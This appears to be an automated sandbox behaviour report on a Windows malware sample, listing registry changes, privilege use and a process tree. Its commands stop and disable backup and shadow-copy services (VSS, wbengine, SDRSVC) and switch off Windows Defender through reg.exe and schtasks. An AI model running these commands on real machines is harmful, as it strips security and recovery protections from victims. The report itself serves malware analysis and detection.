\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE -
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2256 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exedf2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exemsiexec.exepid process 1624 powershell.exe 2128 powershell.exe 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe 2664 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 908 wevtutil.exe Token: SeBackupPrivilege 908 wevtutil.exe Token: SeSecurityPrivilege 1224 wevtutil.exe Token: SeBackupPrivilege 1224 wevtutil.exe Token: SeSecurityPrivilege 1744 wevtutil.exe Token: SeBackupPrivilege 1744 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1888 wmic.exe Token: SeSecurityPrivilege 1888 wmic.exe Token: SeTakeOwnershipPrivilege 1888 wmic.exe Token: SeLoadDriverPrivilege 1888 wmic.exe Token: SeSystemProfilePrivilege 1888 wmic.exe Token: SeSystemtimePrivilege 1888 wmic.exe Token: SeProfSingleProcessPrivilege 1888 wmic.exe Token: SeIncBasePriorityPrivilege 1888 wmic.exe Token: SeCreatePagefilePrivilege 1888 wmic.exe Token: SeBackupPrivilege 1888 wmic.exe Token: SeRestorePrivilege 1888 wmic.exe Token: SeShutdownPrivilege 1888 wmic.exe Token: SeDebugPrivilege 1888 wmic.exe Token: SeSystemEnvironmentPrivilege 1888 wmic.exe Token: SeRemoteShutdownPrivilege 1888 wmic.exe Token: SeUndockPrivilege 1888 wmic.exe Token: SeManageVolumePrivilege 1888 wmic.exe Token: 33 1888 wmic.exe Token: 34 1888 wmic.exe Token: 35 1888 wmic.exe Token: SeIncreaseQuotaPrivilege 560 wmic.exe Token: SeSecurityPrivilege 560 wmic.exe Token: SeTakeOwnershipPrivilege 560 wmic.exe Token: SeLoadDriverPrivilege 560 wmic.exe Token: SeSystemProfilePrivilege 560 wmic.exe Token: SeSystemtimePrivilege 560 wmic.exe Token: SeProfSingleProcessPrivilege 560 wmic.exe Token: SeIncBasePriorityPrivilege 560 wmic.exe Token: SeCreatePagefilePrivilege 560 wmic.exe Token: SeBackupPrivilege 560 wmic.exe Token: SeRestorePrivilege 560 wmic.exe Token: SeShutdownPrivilege 560 wmic.exe Token: SeDebugPrivilege 560 wmic.exe Token: SeSystemEnvironmentPrivilege 560 wmic.exe Token: SeRemoteShutdownPrivilege 560 wmic.exe Token: SeUndockPrivilege 560 wmic.exe Token: SeManageVolumePrivilege 560 wmic.exe Token: 33 560 wmic.exe Token: 34 560 wmic.exe Token: 35 560 wmic.exe Token: SeIncreaseQuotaPrivilege 560 wmic.exe Token: SeSecurityPrivilege 560 wmic.exe Token: SeTakeOwnershipPrivilege 560 wmic.exe Token: SeLoadDriverPrivilege 560 wmic.exe Token: SeSystemProfilePrivilege 560 wmic.exe Token: SeSystemtimePrivilege 560 wmic.exe Token: SeProfSingleProcessPrivilege 560 wmic.exe Token: SeIncBasePriorityPrivilege 560 wmic.exe Token: SeCreatePagefilePrivilege 560 wmic.exe Token: SeBackupPrivilege 560 wmic.exe Token: SeRestorePrivilege 560 wmic.exe Token: SeShutdownPrivilege 560 wmic.exe Token: SeDebugPrivilege 560 wmic.exe Token: SeSystemEnvironmentPrivilege 560 wmic.exe Token: SeRemoteShutdownPrivilege 560 wmic.exe Token: SeUndockPrivilege 560 wmic.exe Token: SeManageVolumePrivilege 560 wmic.exe Token: 33 560 wmic.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
WINWORD.EXEpid process 2256 WINWORD.EXE 2256 WINWORD.EXE 2256 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
WINWORD.EXEpid process 2256 WINWORD.EXE 2256 WINWORD.EXE 2256 WINWORD.EXE 2256 WINWORD.EXE 2256 WINWORD.EXE 2256 WINWORD.EXE 2256 WINWORD.EXE 2256 WINWORD.EXE 2256 WINWORD.EXE 2256 WINWORD.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1532 wrote to memory of 796 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 1532 wrote to memory of 796 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 1532 wrote to memory of 796 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 796 wrote to memory of 588 796 net.exe net1.exe PID 796 wrote to memory of 588 796 net.exe net1.exe PID 796 wrote to memory of 588 796 net.exe net1.exe PID 1532 wrote to memory of 268 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 1532 wrote to memory of 268 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 1532 wrote to memory of 268 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 268 wrote to memory of 908 268 net.exe net1.exe PID 268 wrote to memory of 908 268 net.exe net1.exe PID 268 wrote to memory of 908 268 net.exe net1.exe PID 1532 wrote to memory of 1088 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 1532 wrote to memory of 1088 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 1532 wrote to memory of 1088 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 1088 wrote to memory of 1652 1088 net.exe net1.exe PID 1088 wrote to memory of 1652 1088 net.exe net1.exe PID 1088 wrote to memory of 1652 1088 net.exe net1.exe PID 1532 wrote to memory of 1400 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 1532 wrote to memory of 1400 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 1532 wrote to memory of 1400 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 1400 wrote to memory of 1804 1400 net.exe net1.exe PID 1400 wrote to memory of 1804 1400 net.exe net1.exe PID 1400 wrote to memory of 1804 1400 net.exe net1.exe PID 1532 wrote to memory of 832 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 1532 wrote to memory of 832 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 1532 wrote to memory of 832 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 832 wrote to memory of 1796 832 net.exe net1.exe PID 832 wrote to memory of 1796 832 net.exe net1.exe PID 832 wrote to memory of 1796 832 net.exe net1.exe PID 1532 wrote to memory of 1068 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 1532 wrote to memory of 1068 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 1532 wrote to memory of 1068 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 1068 wrote to memory of 1872 1068 net.exe net1.exe PID 1068 wrote to memory of 1872 1068 net.exe net1.exe PID 1068 wrote to memory of 1872 1068 net.exe net1.exe PID 1532 wrote to memory of 1664 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 1532 wrote to memory of 1664 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 1532 wrote to memory of 1664 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 1664 wrote to memory of 1520 1664 net.exe net1.exe PID 1664 wrote to memory of 1520 1664 net.exe net1.exe PID 1664 wrote to memory of 1520 1664 net.exe net1.exe PID 1532 wrote to memory of 1828 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 1532 wrote to memory of 1828 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 1532 wrote to memory of 1828 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 1828 wrote to memory of 1632 1828 net.exe net1.exe PID 1828 wrote to memory of 1632 1828 net.exe net1.exe PID 1828 wrote to memory of 1632 1828 net.exe net1.exe PID 1532 wrote to memory of 1032 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 1532 wrote to memory of 1032 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 1532 wrote to memory of 1032 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 1532 wrote to memory of 1692 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 1532 wrote to memory of 1692 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 1532 wrote to memory of 1692 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 1532 wrote to memory of 1784 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 1532 wrote to memory of 1784 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 1532 wrote to memory of 1784 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 1532 wrote to memory of 1908 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 1532 wrote to memory of 1908 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 1532 wrote to memory of 1908 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 1532 wrote to memory of 568 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 1532 wrote to memory of 568 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 1532 wrote to memory of 568 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 1532 wrote to memory of 1716 1532 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe"C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:796 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:588
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:268 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:908
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1652
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1400 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1804
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1796
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1872
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1520
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1632
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1032
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1692
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1784
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1908
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:568
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1716
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:916
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2024
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1616
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:520
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:468
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:544
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:584
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1804
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1132
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1264
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1448
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1556
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1836
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1748
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:700
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1944
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1188
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1924
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1612
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1592
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:688
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:432
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1100
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1808
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1632
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2032
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:2008
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1912
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1820
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:360
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1356
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:380
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1872
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1008 -
